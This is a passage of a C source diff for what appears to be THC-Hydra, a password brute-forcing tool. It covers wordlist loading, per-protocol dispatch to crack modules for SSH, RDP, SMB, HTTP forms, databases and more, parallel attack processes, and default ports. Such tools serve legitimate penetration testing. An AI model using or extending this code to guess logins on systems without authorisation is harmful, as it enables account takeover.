+ if (hydra_heads != NULL) { + for (i = 0; i < hydra_options.max_use; i++) + if (hydra_heads[i] != NULL && hydra_heads[i]->pid > 0) + kill(hydra_heads[i]->pid, SIGTERM); + for (i = 0; i < hydra_options.max_use; i++) + if (hydra_heads[i] != NULL && hydra_heads[i]->pid > 0) + kill(hydra_heads[i]->pid, SIGKILL); + } + exit(0); +} + +unsigned long int countlines(FILE * fp, int colonmode) { + size_t lines = 0; + char *buf = malloc(MAXLINESIZE); + int only_one_empty_line = 0; + struct stat st; + + while (!feof(fp)) { + if (fgets(buf, MAXLINESIZE, fp) != NULL) { + if (buf[0] != 0) { + if (buf[0] == '\r' || buf[0] == '\n') { + if (only_one_empty_line == 0) { + only_one_empty_line = 1; + lines++; + } + } else { + lines++; + } + } + } + } + rewind(fp); + free(buf); + fstat(fileno(fp), &st); + size_of_data = st.st_size + 1; + return lines; +} + +void fill_mem(char *ptr, FILE * fp, int colonmode) { + char tmp[MAXBUF + 4] = "", *ptr2; + unsigned int len; + int only_one_empty_line = 0; + + while (!feof(fp)) { + if (fgets(tmp, MAXLINESIZE, fp) != NULL) { + if (tmp[0] != 0) { + if (tmp[strlen(tmp) - 1] == '\n') + tmp[strlen(tmp) - 1] = '\0'; + if (tmp[0] != 0 && tmp[strlen(tmp) - 1] == '\r') + tmp[strlen(tmp) - 1] = '\0'; + if ((len = strlen(tmp)) > 0 || (only_one_empty_line == 0 && colonmode == 0)) { + if (len == 0 && colonmode == 0) { + only_one_empty_line = 1; + len = 1; + tmp[len] = 0; + } + if (colonmode) { + if ((ptr2 = index(tmp, ':')) == NULL) { + fprintf(stderr, "[ERROR] invalid line in colon file (-C), missing colon in line: %s\n", tmp); + exit(-1); + } else { +// if (tmp[0] == ':') { +// *ptr = 0; +// ptr++; +// } +// if (tmp[len - 1] == ':' && len > 1) { +// len++; +// tmp[len - 1] = 0; +// } + *ptr2 = 0; + } + } + memcpy(ptr, tmp, len); + ptr += len; + *ptr = '\0'; + ptr++; + } + } + } + } + fclose(fp); +} + +char *hydra_build_time() { + static char datetime[24]; + struct tm *the_time; + time_t epoch; + + time(&epoch); + the_time = localtime(&epoch); + strftime(datetime, sizeof(datetime), "%Y-%m-%d %H:%M:%S", the_time); + return (char *) &datetime; +} + +void hydra_service_init(int target_no) { + int x = 99; + +#ifdef LIBAFP + if (strcmp(hydra_options.service, "afp") == 0) + x = service_afp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "asterisk") == 0) + x = service_asterisk_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "cisco-enable") == 0) + x = service_cisco_enable_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "cvs") == 0) + x = service_cvs_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "cisco") == 0) + x = service_cisco_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBFIREBIRD + if (strcmp(hydra_options.service, "firebird") == 0) + x = service_firebird_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "ftp") == 0 || strcmp(hydra_options.service, "ftps") == 0) + x = service_ftp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "redis") == 0 || strcmp(hydra_options.service, "redis") == 0) + x = service_redis_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-get") == 0 || strcmp(hydra_options.service, "http-head") == 0) + x = service_http_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-form") == 0 || strcmp(hydra_options.service, "http-get-form") == 0 || strcmp(hydra_options.service, "http-post-form") == 0) + x = service_http_form_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-proxy") == 0) + x = service_http_proxy_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-proxy-urlenum") == 0) + x = service_http_proxy_urlenum_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "icq") == 0) + x = service_icq_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "imap") == 0) + x = service_imap_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "irc") == 0) + x = service_irc_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strncmp(hydra_options.service, "ldap", 4) == 0) + x = service_ldap_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBOPENSSL + if (strcmp(hydra_options.service, "sip") == 0) + x = service_sip_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "smb") == 0 || strcmp(hydra_options.service, "smbnt") == 0) + x = service_smb_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "oracle-listener") == 0) + x = service_oracle_listener_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "oracle-sid") == 0) + x = service_oracle_sid_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "rdp") == 0) + x = service_rdp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "mssql") == 0) + x = service_mssql_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef HAVE_MATH_H + if (strcmp(hydra_options.service, "mysql") == 0) + x = service_mysql_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBNCP + if (strcmp(hydra_options.service, "ncp") == 0) + x = service_ncp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "nntp") == 0) + x = service_nntp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBORACLE + if (strcmp(hydra_options.service, "oracle") == 0) + x = service_oracle_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "pcanywhere") == 0) + x = service_pcanywhere_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "pcnfs") == 0) + x = service_pcnfs_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "pop3") == 0) + x = service_pop3_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBPOSTGRES + if (strcmp(hydra_options.service, "postgres") == 0) + x = service_postgres_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "rexec") == 0) + x = service_rexec_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "rlogin") == 0) + x = service_rlogin_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "rsh") == 0) + x = service_rsh_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBSAPR3 + if (strcmp(hydra_options.service, "sapr3") == 0) + x = service_sapr3_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "smtp") == 0) + x = service_smtp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "smtp-enum") == 0) + x = service_smtp_enum_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "snmp") == 0) + x = service_snmp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "socks5") == 0) + x = service_socks5_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBSSH + if (strcmp(hydra_options.service, "ssh") == 0) + x = service_ssh_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "sshkey") == 0) + x = service_sshkey_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBSVN + if (strcmp(hydra_options.service, "svn") == 0) + x = service_svn_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "teamspeak") == 0) + x = service_teamspeak_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "telnet") == 0) + x = service_telnet_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "vmauthd") == 0) + x = service_vmauthd_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "vnc") == 0) + x = service_vnc_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "xmpp") == 0) + x = service_xmpp_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "s7-300") == 0) + x = service_s7_300_init(hydra_targets[target_no]->ip, -1, options, hydra_options.miscptr, hydra_brains.ofp, port); +// ADD NEW SERVICES HERE + + if (x != 0 && x != 99) { + if (x > 0 && x < 4) + hydra_targets[target_no]->done = x; + else + hydra_targets[target_no]->done = 2; + hydra_brains.finished++; + if (hydra_brains.targets == 1) + exit(-1); + } +} + + +int hydra_spawn_head(int head_no, int target_no) { + int i; + + if (hydra_heads[head_no]->active < 0) { + printf("DEBUG-ERROR - child %d should not be respawned!\n", head_no); + return -1; + } + + if (socketpair(PF_UNIX, SOCK_STREAM, 0, hydra_heads[head_no]->sp) == 0) { + child_head_no = head_no; + if ((hydra_heads[head_no]->pid = fork()) == 0) { // THIS IS THE CHILD + // set new signals for child + process_restore = 0; + child_socket = hydra_heads[head_no]->sp[1]; + signal(SIGCHLD, killed_childs); + signal(SIGTERM, exit); +#ifdef SIGBUS + signal(SIGBUS, exit); +#endif + signal(SIGSEGV, killed_childs_report); + signal(SIGHUP, exit); + signal(SIGINT, exit); + signal(SIGPIPE, exit); + // free structures to make memory available + cmdlinetarget = hydra_targets[target_no]->target; + for (i = 0; i < hydra_options.max_use; i++) + if (i != head_no) + free(hydra_heads[i]); + for (i = 0; i < countservers; i++) + if (i != target_no) + free(hydra_targets[i]); + if (hydra_options.loginfile != NULL) + free(login_ptr); + if (hydra_options.passfile != NULL) + free(pass_ptr); + if (hydra_options.colonfile != NULL && hydra_options.colonfile != empty_login) + free(csv_ptr); +// we must keep servers_ptr for cmdlinetarget to work + if (debug) + printf("[DEBUG] head_no %d has pid %d\n", head_no, getpid()); + + // now call crack module + if (strcmp(hydra_options.service, "asterisk") == 0) + service_asterisk(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "telnet") == 0) + service_telnet(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "ftp") == 0) + service_ftp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "ftps") == 0) + service_ftps(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "redis") == 0) + service_redis(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "pop3") == 0) + service_pop3(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "imap") == 0) + service_imap(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "vmauthd") == 0) + service_vmauthd(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "ldap2") == 0) + service_ldap2(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "ldap3") == 0) + service_ldap3(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-head") == 0) + service_http_head(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "ldap3-crammd5") == 0) + service_ldap3_cram_md5(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "ldap3-digestmd5") == 0) + service_ldap3_digest_md5(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-get") == 0) + service_http_get(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-get-form") == 0) + service_http_get_form(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-post-form") == 0) + service_http_post_form(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-proxy") == 0) + service_http_proxy(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "http-proxy-urlenum") == 0) + service_http_proxy_urlenum(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "cisco") == 0) + service_cisco(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "cisco-enable") == 0) + service_cisco_enable(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "socks5") == 0) + service_socks5(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "vnc") == 0) + service_vnc(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "rexec") == 0) + service_rexec(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "rlogin") == 0) + service_rlogin(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "rsh") == 0) + service_rsh(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "nntp") == 0) + service_nntp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "icq") == 0) + service_icq(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "pcnfs") == 0) + service_pcnfs(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef HAVE_MATH_H + if (strcmp(hydra_options.service, "mysql") == 0) + service_mysql(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "mssql") == 0) + service_mssql(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBOPENSSL + if (strcmp(hydra_options.service, "oracle-listener") == 0) + service_oracle_listener(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "oracle-sid") == 0) + service_oracle_sid(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBORACLE + if (strcmp(hydra_options.service, "oracle") == 0) + service_oracle(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBPOSTGRES + if (strcmp(hydra_options.service, "postgres") == 0) + service_postgres(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBFIREBIRD + if (strcmp(hydra_options.service, "firebird") == 0) + service_firebird(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBAFP + if (strcmp(hydra_options.service, "afp") == 0) + service_afp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBNCP + if (strcmp(hydra_options.service, "ncp") == 0) + service_ncp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "pcanywhere") == 0) + service_pcanywhere(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "cvs") == 0) + service_cvs(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBSVN + if (strcmp(hydra_options.service, "svn") == 0) + service_svn(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "snmp") == 0) + service_snmp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBOPENSSL + if ((strcmp(hydra_options.service, "smb") == 0) || (strcmp(hydra_options.service, "smbnt") == 0)) + service_smb(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBSAPR3 + if (strcmp(hydra_options.service, "sapr3") == 0) + service_sapr3(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif +#ifdef LIBSSH + if (strcmp(hydra_options.service, "ssh") == 0) + service_ssh(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "sshkey") == 0) + service_sshkey(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "smtp") == 0) + service_smtp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "smtp-enum") == 0) + service_smtp_enum(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "teamspeak") == 0) + service_teamspeak(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBOPENSSL + if (strcmp(hydra_options.service, "sip") == 0) + service_sip(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "xmpp") == 0) + service_xmpp(hydra_targets[target_no]->target, hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); + if (strcmp(hydra_options.service, "irc") == 0) + service_irc(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#ifdef LIBOPENSSL + if (strcmp(hydra_options.service, "rdp") == 0) + service_rdp(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +#endif + if (strcmp(hydra_options.service, "s7-300") == 0) + service_s7_300(hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, port); +// ADD NEW SERVICES HERE + + // just in case a module returns (which it shouldnt) we let it exit here + exit(-1); + } else { + child_head_no = -1; + if (hydra_heads[head_no]->pid > 0) { + fck = write(hydra_heads[head_no]->sp[1], "n", 1); // yes, a small "n" - this way we can distinguish later if the client successfully tested a pair and is requesting a new one or the mother did that + fcntl(hydra_heads[head_no]->sp[0], F_SETFL, O_NONBLOCK); + if (hydra_heads[head_no]->redo != 1) + hydra_heads[head_no]->target_no = target_no; + hydra_heads[head_no]->active = 1; + hydra_targets[hydra_heads[head_no]->target_no]->use_count++; + hydra_brains.active++; + hydra_heads[head_no]->last_seen = time(NULL); + if (debug) + printf("[DEBUG] child %d spawned for target %d with pid %d\n", head_no, hydra_heads[head_no]->target_no, hydra_heads[head_no]->pid); + } else { + perror("[ERROR] Fork for children failed"); + hydra_heads[head_no]->sp[0] = -1; + hydra_heads[head_no]->active = 0; + return -1; + } + } + } else { + perror("[ERROR] socketpair creation failed"); + hydra_heads[head_no]->sp[0] = -1; + hydra_heads[head_no]->active = 0; + return -1; + } + return 0; +} + +int hydra_lookup_port(char *service) { + int i = 0, port = -2; + + hydra_portlist hydra_portlists[] = { + {"ftp", PORT_FTP, PORT_FTP_SSL}, + {"ftps", PORT_FTP, PORT_FTP_SSL}, + {"http-head", PORT_HTTP, PORT_HTTP_SSL}, + {"http-get", PORT_HTTP, PORT_HTTP_SSL}, + {"http-get-form", PORT_HTTP, PORT_HTTP_SSL}, + {"http-post-form", PORT_HTTP, PORT_HTTP_SSL}, + {"https-get-form", PORT_HTTP, PORT_HTTP_SSL}, + {"https-post-form", PORT_HTTP, PORT_HTTP_SSL}, + {"https-head", PORT_HTTP, PORT_HTTP_SSL}, + {"https-get", PORT_HTTP, PORT_HTTP_SSL}, + {"http-proxy", PORT_HTTP_PROXY, PORT_HTTP_PROXY_SSL}, + {"http-proxy-urlenum", PORT_HTTP_PROXY, PORT_HTTP_PROXY_SSL}, + {"icq", PORT_ICQ, PORT_ICQ_SSL}, + {"imap", PORT_IMAP, PORT_IMAP_SSL}, + {"ldap2", PORT_LDAP, PORT_LDAP_SSL}, + {"ldap3", PORT_LDAP, PORT_LDAP_SSL}, + {"ldap3-crammd5", PORT_LDAP, PORT_LDAP_SSL}, + {"ldap3-digestmd5", PORT_LDAP, PORT_LDAP_SSL}, + {"oracle-listener", PORT_ORACLE, PORT_ORACLE_SSL}, + {"oracle-sid", PORT_ORACLE, PORT_ORACLE_SSL}, + {"oracle", PORT_ORACLE, PORT_ORACLE_SSL}, + {"mssql", PORT_MSSQL, PORT_MSSQL_SSL}, + {"mysql", PORT_MYSQL, PORT_MYSQL_SSL}, + {"postgres", PORT_POSTGRES, PORT_POSTGRES_SSL}, + {"pcanywhere", PORT_PCANYWHERE, PORT_PCANYWHERE_SSL}, + {"nntp", PORT_NNTP, PORT_NNTP_SSL}, + {"pcnfs", PORT_PCNFS, PORT_PCNFS_SSL}, + {"pop3", PORT_POP3, PORT_POP3_SSL}, + {"redis", PORT_REDIS, PORT_REDIS_SSL}, + {"rexec", PORT_REXEC, PORT_REXEC_SSL}, + {"rlogin", PORT_RLOGIN, PORT_RLOGIN_SSL}, + {"rsh", PORT_RSH, PORT_RSH_SSL}, + {"sapr3", PORT_SAPR3, PORT_SAPR3_SSL}, + {"smb", PORT_SMBNT, PORT_SMBNT_SSL}, + {"smbnt", PORT_SMBNT, PORT_SMBNT_SSL}, + {"socks5", PORT_SOCKS5, PORT_SOCKS5_SSL}, + {"ssh", PORT_SSH, PORT_SSH_SSL}, + {"sshkey", PORT_SSH, PORT_SSH_SSL}, + {"telnet", PORT_TELNET, PORT_TELNET_SSL}, + {"cisco", PORT_TELNET, PORT_TELNET_SSL}, + {"cisco-enable", PORT_TELNET, PORT_TELNET_SSL}, + {"vnc", PORT_VNC, PORT_VNC_SSL}, + {"snmp", PORT_SNMP, PORT_SNMP_SSL}, + {"cvs", PORT_CVS, PORT_CVS_SSL}, + {"svn", PORT_SVN, PORT_SVN_SSL}, + {"firebird", PORT_FIREBIRD, PORT_FIREBIRD_SSL}, + {"afp", PORT_AFP, PORT_AFP_SSL}, + {"ncp", PORT_NCP, PORT_NCP_SSL}, + {"smtp", PORT_SMTP, PORT_SMTP_SSL}, + {"smtp-enum", PORT_SMTP, PORT_SMTP_SSL}, + {"teamspeak", PORT_TEAMSPEAK, PORT_TEAMSPEAK_SSL}, + {"sip", PORT_SIP, PORT_SIP_SSL}, + {"vmauthd", PORT_VMAUTHD, PORT_VMAUTHD_SSL}, + {"xmpp", PORT_XMPP, PORT_XMPP_SSL}, + {"irc", PORT_IRC, PORT_IRC_SSL}, + {"rdp", PORT_RDP, PORT_RDP_SSL}, + {"asterisk", PORT_ASTERISK, PORT_ASTERISK_SSL}, + {"s7-300", PORT_S7_300, PORT_S7_300_SSL}, +// ADD NEW SERVICES HERE - add new port numbers to hydra.h + {"", PORT_NOPORT, PORT_NOPORT} + }; + + while (strlen(hydra_portlists[i].name) > 0 && port == -2) { + if (strcmp(service, hydra_portlists[i].name) == 0) { + if (hydra_options.ssl) + port = hydra_portlists[i].port_ssl; + else + port = hydra_portlists[i].port; + } + i++; + } + if (port < 1) + return -1; + else + return port; +} + +// killit = 1 : kill(pid); fail = 1 : redo, fail = 2 : disable +void hydra_kill_head(int head_no, int killit, int fail) { + if (hydra_heads[head_no]->active > 0) { + close(hydra_heads[head_no]->sp[0]); + close(hydra_heads[head_no]->sp[1]); + } + if (killit) { + if (hydra_heads[head_no]->pid > 0) + kill(hydra_heads[head_no]->pid, SIGTERM); + hydra_brains.active--; + } + if (hydra_heads[head_no]->active > 0) { + hydra_heads[head_no]->active = 0; + hydra_targets[hydra_heads[head_no]->target_no]->use_count--; + } + if (fail == 1) + hydra_heads[head_no]->redo = 1; + else if (fail == 2) { + hydra_heads[head_no]->active = -1; + hydra_targets[hydra_heads[head_no]->target_no]->failed++; + } + if (hydra_heads[head_no]->pid > 0 && killit) + kill(hydra_heads[head_no]->pid, SIGKILL); + hydra_heads[head_no]->pid = -1; + if (fail < 1 && hydra_options.bfg && hydra_targets[hydra_heads[head_no]->target_no]->pass_state == 3 + && strlen(hydra_heads[head_no]->current_pass_ptr) > 0 && hydra_heads[head_no]->current_pass_ptr != hydra_heads[head_no]->current_login_ptr) { + free(hydra_heads[head_no]->current_pass_ptr); + hydra_heads[head_no]->current_pass_ptr = empty_login; +// hydra_bfg_remove(head_no); +// hydra_targets[hydra_heads[head_no]->target_no]->bfg_ptr[head_no] = NULL; + } + (void) wait3(NULL, WNOHANG, NULL); +} + +void hydra_increase_fail_count(int target_no, int head_no) { + int i, k; + + hydra_targets[target_no]->fail_count++; + if (debug) + printf("[DEBUG] hydra_increase_fail_count: %d >= %d => disable\n", hydra_targets[target_no]->fail_count, + MAXFAIL + (hydra_options.tasks <= 4 && hydra_targets[target_no]->ok ? 6 - hydra_options.tasks : 1) + (hydra_options.tasks - hydra_targets[target_no]->failed < 5 + && hydra_targets[target_no]->ok ? 6 - (hydra_options.tasks - + hydra_targets[target_no]-> + failed) : 1) + + (hydra_targets[target_no]->ok ? 2 : -2)); + if (hydra_targets[target_no]->fail_count >= + MAXFAIL + (hydra_options.tasks <= 4 && hydra_targets[target_no]->ok ? 6 - hydra_options.tasks : 1) + (hydra_options.tasks - hydra_targets[target_no]->failed < 5 + && hydra_targets[target_no]->ok ? 6 - (hydra_options.tasks - + hydra_targets[target_no]-> + failed) : 1) + + (hydra_targets[target_no]->ok ? 2 : 